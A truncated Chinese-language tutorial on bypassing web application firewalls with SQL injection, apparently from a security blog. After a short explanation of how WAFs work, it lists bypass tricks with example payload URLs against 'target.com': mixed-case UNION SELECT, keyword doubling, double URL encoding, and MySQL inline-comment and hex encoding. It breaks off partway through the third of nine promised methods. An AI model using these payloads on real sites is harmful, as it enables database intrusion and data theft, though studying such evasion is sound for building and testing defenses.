mysql绕waf_SQL注入9种绕过WAF方法

SQL注入9种绕过WAF方法

0x01前言

WAF区别于常规防火墙是因为WAF能够过滤特定Web应用程序的内容，而常规防火墙则充当服务器之间的防御门。通过检查HTTP的流量，它可以防御Web应用安全漏洞，如阻止来自、(XSS)、和安全配置错误。

0x02 WAF工作原理

§检测异常协议：拒绝不符合HTTP标准的请求

§增强型的输入验证：代理和服务器端验证，而不仅仅是客户端验证

§白名单和黑名单

§基于规则和异常的保护：基于规则的更多是基于黑色的机制和更灵活的异常

§状态管理：防御会话保护(Cookie保护，反入侵规避技术，响应监控和信息披露保护)。

0x03绕过WAF

1.混合的CaseChange恶意输入会触发WAF保护，如果WAF使用区分大小写的黑名单，则更改大小写可能会绕过该过滤器。

http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4

2.替换关键字(插入将被WAF删除的特殊字符)---SELECT可能变为SEL

http://target.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4

3.编码page.php?id=1%252f%252a*/UNION%252f%252a

/SELECT

十六进制编码：

target.com/index.php?page_id=-15

/*!u%6eion*/ /*!se%6cect*/ 1,2,3,4… SELECT(extractvalue(0x3C613E61646D696E3C2F